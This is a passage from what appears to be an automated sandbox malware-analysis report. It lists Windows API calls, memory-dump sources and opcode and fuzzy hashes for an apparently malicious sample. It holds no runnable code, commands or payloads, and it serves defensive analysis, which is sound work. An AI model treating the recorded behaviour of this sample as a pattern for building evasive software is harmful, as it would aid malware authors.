                                • LocalAlloc.KERNELBASE(00000000,02B18CE4,00415E8B), ref: 004157F8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd
                                Similarity
                                • API ID: AllocLocal
                                • String ID:
                                • API String ID: 3494564517-0
                                • Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                • Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
                                • Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                • Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14
                                APIs
                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00415A21
                                • WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 00415A45
                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415A4D
                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415A8D
                                • GetComputerNameW.KERNEL32(?,?), ref: 00415AA1
                                • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415AAF
                                • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415ABE
                                • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415ACF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd
                                Similarity
                                • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                • String ID: -
                                • API String ID: 113859268-2547889144
                                • Opcode ID: db8dc46efc40b99fabcfa4c7d1f5ac96ecf50084b678cb0d3d0fd53c861d6c22
                                • Instruction ID: 2c7d7bcc96ebfa56bd727007de7ac8ab34d93c8d3fedf15d4148c8bbf7674042
                                • Opcode Fuzzy Hash: db8dc46efc40b99fabcfa4c7d1f5ac96ecf50084b678cb0d3d0fd53c861d6c22
                                • Instruction Fuzzy Hash: 4321F731A84308EAD720DF94DC85BD97B70EF4C752F1181AAFA49AA1C0CAB45AC4CB59
                                APIs
                                • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415B44
                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B5F
                                • HeapDestroy.KERNEL32(00000000), ref: 00415B7E
                                • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415B86
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd
                                Similarity
                                • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                • String ID:
                                • API String ID: 367530164-0
                                • Opcode ID: 2eaa3619de8731856ba23563b2baea9085cebb685e66d531b2d230375b233c37
                                • Instruction ID: f8d66b9204655c3a429d25ec7d87b798a9bd44671bb4d674f784994b3474509b
                                • Opcode Fuzzy Hash: 2eaa3619de8731856ba23563b2baea9085cebb685e66d531b2d230375b233c37
                                • Instruction Fuzzy Hash: FF012670A82504DBE750EBB4EC85BDA7BA8F70C306F804037F60A97280DE346C54CB9A